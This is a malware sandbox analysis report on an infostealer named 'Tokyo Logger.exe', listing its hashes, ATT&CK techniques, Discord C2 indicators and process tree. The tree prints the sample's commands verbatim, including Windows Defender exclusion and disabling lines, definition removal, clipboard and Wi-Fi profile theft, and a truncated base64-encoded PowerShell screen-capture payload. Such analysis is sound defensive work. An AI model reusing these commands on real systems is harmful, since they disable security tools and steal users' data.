28d56ed7f2f5ae7558a1f303e3a4ebc0a01a118bd674a2dbb3a0d0e550c50591

Analysis

max time kernel
93s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23/12/2024, 22:37 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Tokyo Logger.exe
Size

8.2MB
MD5

bfc95ddea20fbd937b316604def70873
SHA1

248f86ab1ecefd654751ecc20f09684b8392d790
SHA256

28d56ed7f2f5ae7558a1f303e3a4ebc0a01a118bd674a2dbb3a0d0e550c50591
SHA512

00c1a4177bebb36ca4c2933fc8614ee97d98962ff1a5b0f6df380ffcd4858e92e250fb2fae22f70da1099000851bf56d62906b0e338baa432105324884ce7fb6
SSDEEP

196608:5yeurErvI9pWjgyvoaYrE41JI9YIwoOdhQ:4eurEUWjdo/H1JboChQ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1708	powershell.exe
4328	powershell.exe
3988	powershell.exe
5048	powershell.exe
3928	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3172	cmd.exe
2532	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4796	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe
2160	Tokyo Logger.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4924	tasklist.exe
4064	tasklist.exe
1512	tasklist.exe
1352	tasklist.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ccd-63.dat	upx
behavioral2/memory/2160-66-0x00007FFA9AED0000-0x00007FFA9B4C0000-memory.dmp	upx
behavioral2/files/0x0007000000023c98-69.dat	upx
behavioral2/files/0x0007000000023ccb-71.dat	upx
behavioral2/memory/2160-127-0x00007FFAB0300000-0x00007FFAB030F000-memory.dmp	upx
behavioral2/files/0x0007000000023c9d-126.dat	upx
behavioral2/files/0x0007000000023c9c-125.dat	upx
behavioral2/files/0x0007000000023c9b-124.dat	upx
behavioral2/files/0x0007000000023c9a-123.dat	upx
behavioral2/files/0x0007000000023c99-122.dat	upx
behavioral2/files/0x0007000000023c97-121.dat	upx
behavioral2/files/0x0007000000023cd3-120.dat	upx
behavioral2/files/0x0007000000023cd1-119.dat	upx
behavioral2/files/0x0008000000023cd0-118.dat	upx
behavioral2/files/0x0007000000023ccc-115.dat	upx
behavioral2/files/0x0007000000023cca-114.dat	upx
behavioral2/memory/2160-72-0x00007FFAB03C0000-0x00007FFAB03E4000-memory.dmp	upx
behavioral2/memory/2160-132-0x00007FFAA9BC0000-0x00007FFAA9BED000-memory.dmp	upx
behavioral2/memory/2160-134-0x00007FFAA98A0000-0x00007FFAA98C3000-memory.dmp	upx
behavioral2/memory/2160-133-0x00007FFAA9BA0000-0x00007FFAA9BB9000-memory.dmp	upx
behavioral2/memory/2160-135-0x00007FFA9A920000-0x00007FFA9AA96000-memory.dmp	upx
behavioral2/memory/2160-137-0x00007FFAA9EF0000-0x00007FFAA9EFD000-memory.dmp	upx
behavioral2/memory/2160-136-0x00007FFAA8710000-0x00007FFAA8729000-memory.dmp	upx
behavioral2/memory/2160-139-0x00007FFAA6610000-0x00007FFAA6643000-memory.dmp	upx
behavioral2/memory/2160-143-0x00007FFAB03C0000-0x00007FFAB03E4000-memory.dmp	upx
behavioral2/memory/2160-142-0x00007FFA9A290000-0x00007FFA9A35D000-memory.dmp	upx
behavioral2/memory/2160-140-0x00007FFA99D60000-0x00007FFA9A289000-memory.dmp	upx
behavioral2/memory/2160-138-0x00007FFA9AED0000-0x00007FFA9B4C0000-memory.dmp	upx
behavioral2/memory/2160-144-0x00007FFAAF200000-0x00007FFAAF214000-memory.dmp	upx
behavioral2/memory/2160-145-0x00007FFAA9CD0000-0x00007FFAA9CDD000-memory.dmp	upx
behavioral2/memory/2160-146-0x00007FFA99C40000-0x00007FFA99D5C000-memory.dmp	upx
behavioral2/memory/2160-169-0x00007FFAA98A0000-0x00007FFAA98C3000-memory.dmp	upx
behavioral2/memory/2160-269-0x00007FFA9A920000-0x00007FFA9AA96000-memory.dmp	upx
behavioral2/memory/2160-309-0x00007FFAA8710000-0x00007FFAA8729000-memory.dmp	upx
behavioral2/memory/2160-353-0x00007FFAA6610000-0x00007FFAA6643000-memory.dmp	upx
behavioral2/memory/2160-354-0x00007FFA99D60000-0x00007FFA9A289000-memory.dmp	upx
behavioral2/memory/2160-357-0x00007FFA9A290000-0x00007FFA9A35D000-memory.dmp	upx
behavioral2/memory/2160-358-0x00007FFA9AED0000-0x00007FFA9B4C0000-memory.dmp	upx
behavioral2/memory/2160-374-0x00007FFAAF200000-0x00007FFAAF214000-memory.dmp	upx
behavioral2/memory/2160-373-0x00007FFA99C40000-0x00007FFA99D5C000-memory.dmp	upx
behavioral2/memory/2160-365-0x00007FFA9A920000-0x00007FFA9AA96000-memory.dmp	upx
behavioral2/memory/2160-360-0x00007FFAB03C0000-0x00007FFAB03E4000-memory.dmp	upx
behavioral2/memory/2160-395-0x00007FFA9AED0000-0x00007FFA9B4C0000-memory.dmp	upx
behavioral2/memory/2160-425-0x00007FFA9AED0000-0x00007FFA9B4C0000-memory.dmp	upx
behavioral2/memory/2160-450-0x00007FFA99D60000-0x00007FFA9A289000-memory.dmp	upx
behavioral2/memory/2160-449-0x00007FFAA6610000-0x00007FFAA6643000-memory.dmp	upx
behavioral2/memory/2160-448-0x00007FFAA9EF0000-0x00007FFAA9EFD000-memory.dmp	upx
behavioral2/memory/2160-447-0x00007FFAA8710000-0x00007FFAA8729000-memory.dmp	upx
behavioral2/memory/2160-446-0x00007FFA9A920000-0x00007FFA9AA96000-memory.dmp	upx
behavioral2/memory/2160-445-0x00007FFAA98A0000-0x00007FFAA98C3000-memory.dmp	upx
behavioral2/memory/2160-444-0x00007FFAA9BA0000-0x00007FFAA9BB9000-memory.dmp	upx
behavioral2/memory/2160-443-0x00007FFAA9BC0000-0x00007FFAA9BED000-memory.dmp	upx
behavioral2/memory/2160-442-0x00007FFAB0300000-0x00007FFAB030F000-memory.dmp	upx
behavioral2/memory/2160-441-0x00007FFAB03C0000-0x00007FFAB03E4000-memory.dmp	upx
behavioral2/memory/2160-440-0x00007FFA9A290000-0x00007FFA9A35D000-memory.dmp	upx
behavioral2/memory/2160-439-0x00007FFA99C40000-0x00007FFA99D5C000-memory.dmp	upx
behavioral2/memory/2160-438-0x00007FFAA9CD0000-0x00007FFAA9CDD000-memory.dmp	upx
behavioral2/memory/2160-437-0x00007FFAAF200000-0x00007FFAAF214000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
952	cmd.exe
224	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2736	WMIC.exe
3912	WMIC.exe
2252	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4088	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1708	powershell.exe
3988	powershell.exe
3988	powershell.exe
1708	powershell.exe
4328	powershell.exe
4328	powershell.exe
2532	powershell.exe
2532	powershell.exe
2532	powershell.exe
5040	powershell.exe
5040	powershell.exe
5040	powershell.exe
5048	powershell.exe
5048	powershell.exe
1300	powershell.exe
1300	powershell.exe
3928	powershell.exe
3928	powershell.exe
1140	powershell.exe
1140	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4600	WMIC.exe
Token: SeSecurityPrivilege	4600	WMIC.exe
Token: SeTakeOwnershipPrivilege	4600	WMIC.exe
Token: SeLoadDriverPrivilege	4600	WMIC.exe
Token: SeSystemProfilePrivilege	4600	WMIC.exe
Token: SeSystemtimePrivilege	4600	WMIC.exe
Token: SeProfSingleProcessPrivilege	4600	WMIC.exe
Token: SeIncBasePriorityPrivilege	4600	WMIC.exe
Token: SeCreatePagefilePrivilege	4600	WMIC.exe
Token: SeBackupPrivilege	4600	WMIC.exe
Token: SeRestorePrivilege	4600	WMIC.exe
Token: SeShutdownPrivilege	4600	WMIC.exe
Token: SeDebugPrivilege	4600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4600	WMIC.exe
Token: SeRemoteShutdownPrivilege	4600	WMIC.exe
Token: SeUndockPrivilege	4600	WMIC.exe
Token: SeManageVolumePrivilege	4600	WMIC.exe
Token: 33	4600	WMIC.exe
Token: 34	4600	WMIC.exe
Token: 35	4600	WMIC.exe
Token: 36	4600	WMIC.exe
Token: SeDebugPrivilege	4924	tasklist.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeIncreaseQuotaPrivilege	4600	WMIC.exe
Token: SeSecurityPrivilege	4600	WMIC.exe
Token: SeTakeOwnershipPrivilege	4600	WMIC.exe
Token: SeLoadDriverPrivilege	4600	WMIC.exe
Token: SeSystemProfilePrivilege	4600	WMIC.exe
Token: SeSystemtimePrivilege	4600	WMIC.exe
Token: SeProfSingleProcessPrivilege	4600	WMIC.exe
Token: SeIncBasePriorityPrivilege	4600	WMIC.exe
Token: SeCreatePagefilePrivilege	4600	WMIC.exe
Token: SeBackupPrivilege	4600	WMIC.exe
Token: SeRestorePrivilege	4600	WMIC.exe
Token: SeShutdownPrivilege	4600	WMIC.exe
Token: SeDebugPrivilege	4600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4600	WMIC.exe
Token: SeRemoteShutdownPrivilege	4600	WMIC.exe
Token: SeUndockPrivilege	4600	WMIC.exe
Token: SeManageVolumePrivilege	4600	WMIC.exe
Token: 33	4600	WMIC.exe
Token: 34	4600	WMIC.exe
Token: 35	4600	WMIC.exe
Token: 36	4600	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2736	WMIC.exe
Token: SeSecurityPrivilege	2736	WMIC.exe
Token: SeTakeOwnershipPrivilege	2736	WMIC.exe
Token: SeLoadDriverPrivilege	2736	WMIC.exe
Token: SeSystemProfilePrivilege	2736	WMIC.exe
Token: SeSystemtimePrivilege	2736	WMIC.exe
Token: SeProfSingleProcessPrivilege	2736	WMIC.exe
Token: SeIncBasePriorityPrivilege	2736	WMIC.exe
Token: SeCreatePagefilePrivilege	2736	WMIC.exe
Token: SeBackupPrivilege	2736	WMIC.exe
Token: SeRestorePrivilege	2736	WMIC.exe
Token: SeShutdownPrivilege	2736	WMIC.exe
Token: SeDebugPrivilege	2736	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2736	WMIC.exe
Token: SeRemoteShutdownPrivilege	2736	WMIC.exe
Token: SeUndockPrivilege	2736	WMIC.exe
Token: SeManageVolumePrivilege	2736	WMIC.exe
Token: 33	2736	WMIC.exe
Token: 34	2736	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3792 wrote to memory of 2160	3792	Tokyo Logger.exe	85
PID 3792 wrote to memory of 2160	3792	Tokyo Logger.exe	85
PID 2160 wrote to memory of 2432	2160	Tokyo Logger.exe	86
PID 2160 wrote to memory of 2432	2160	Tokyo Logger.exe	86
PID 2160 wrote to memory of 224	2160	Tokyo Logger.exe	87
PID 2160 wrote to memory of 224	2160	Tokyo Logger.exe	87
PID 2160 wrote to memory of 4072	2160	Tokyo Logger.exe	90
PID 2160 wrote to memory of 4072	2160	Tokyo Logger.exe	90
PID 2160 wrote to memory of 3568	2160	Tokyo Logger.exe	92
PID 2160 wrote to memory of 3568	2160	Tokyo Logger.exe	92
PID 2432 wrote to memory of 1708	2432	cmd.exe	94
PID 2432 wrote to memory of 1708	2432	cmd.exe	94
PID 3568 wrote to memory of 4600	3568	cmd.exe	96
PID 3568 wrote to memory of 4600	3568	cmd.exe	96
PID 4072 wrote to memory of 4924	4072	cmd.exe	95
PID 4072 wrote to memory of 4924	4072	cmd.exe	95
PID 224 wrote to memory of 3988	224	cmd.exe	97
PID 224 wrote to memory of 3988	224	cmd.exe	97
PID 2160 wrote to memory of 4716	2160	Tokyo Logger.exe	99
PID 2160 wrote to memory of 4716	2160	Tokyo Logger.exe	99
PID 4716 wrote to memory of 2548	4716	cmd.exe	101
PID 4716 wrote to memory of 2548	4716	cmd.exe	101
PID 2160 wrote to memory of 4872	2160	Tokyo Logger.exe	102
PID 2160 wrote to memory of 4872	2160	Tokyo Logger.exe	102
PID 4872 wrote to memory of 5000	4872	cmd.exe	104
PID 4872 wrote to memory of 5000	4872	cmd.exe	104
PID 2160 wrote to memory of 4280	2160	Tokyo Logger.exe	105
PID 2160 wrote to memory of 4280	2160	Tokyo Logger.exe	105
PID 4280 wrote to memory of 2736	4280	cmd.exe	107
PID 4280 wrote to memory of 2736	4280	cmd.exe	107
PID 2160 wrote to memory of 2348	2160	Tokyo Logger.exe	108
PID 2160 wrote to memory of 2348	2160	Tokyo Logger.exe	108
PID 2348 wrote to memory of 3912	2348	cmd.exe	110
PID 2348 wrote to memory of 3912	2348	cmd.exe	110
PID 2160 wrote to memory of 4336	2160	Tokyo Logger.exe	111
PID 2160 wrote to memory of 4336	2160	Tokyo Logger.exe	111
PID 4336 wrote to memory of 4328	4336	cmd.exe	113
PID 4336 wrote to memory of 4328	4336	cmd.exe	113
PID 2160 wrote to memory of 4748	2160	Tokyo Logger.exe	114
PID 2160 wrote to memory of 4748	2160	Tokyo Logger.exe	114
PID 2160 wrote to memory of 3204	2160	Tokyo Logger.exe	116
PID 2160 wrote to memory of 3204	2160	Tokyo Logger.exe	116
PID 3204 wrote to memory of 1512	3204	cmd.exe	118
PID 3204 wrote to memory of 1512	3204	cmd.exe	118
PID 4748 wrote to memory of 4064	4748	cmd.exe	119
PID 4748 wrote to memory of 4064	4748	cmd.exe	119
PID 2160 wrote to memory of 2932	2160	Tokyo Logger.exe	120
PID 2160 wrote to memory of 2932	2160	Tokyo Logger.exe	120
PID 2160 wrote to memory of 3172	2160	Tokyo Logger.exe	121
PID 2160 wrote to memory of 3172	2160	Tokyo Logger.exe	121
PID 2160 wrote to memory of 4104	2160	Tokyo Logger.exe	124
PID 2160 wrote to memory of 4104	2160	Tokyo Logger.exe	124
PID 2160 wrote to memory of 3516	2160	Tokyo Logger.exe	125
PID 2160 wrote to memory of 3516	2160	Tokyo Logger.exe	125
PID 2160 wrote to memory of 952	2160	Tokyo Logger.exe	128
PID 2160 wrote to memory of 952	2160	Tokyo Logger.exe	128
PID 3172 wrote to memory of 2532	3172	cmd.exe	130
PID 3172 wrote to memory of 2532	3172	cmd.exe	130
PID 2160 wrote to memory of 216	2160	Tokyo Logger.exe	131
PID 2160 wrote to memory of 216	2160	Tokyo Logger.exe	131
PID 2932 wrote to memory of 4844	2932	cmd.exe	133
PID 2932 wrote to memory of 4844	2932	cmd.exe	133
PID 2160 wrote to memory of 796	2160	Tokyo Logger.exe	134
PID 2160 wrote to memory of 796	2160	Tokyo Logger.exe	134

C:\Users\Admin\AppData\Local\Temp\Tokyo Logger.exe
"C:\Users\Admin\AppData\Local\Temp\Tokyo Logger.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3792
- C:\Users\Admin\AppData\Local\Temp\Tokyo Logger.exe
  "C:\Users\Admin\AppData\Local\Temp\Tokyo Logger.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Tokyo Logger.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Tokyo Logger.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4072
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4716
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4872
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4748
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3204
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4104
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3516
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:952
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:216
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgA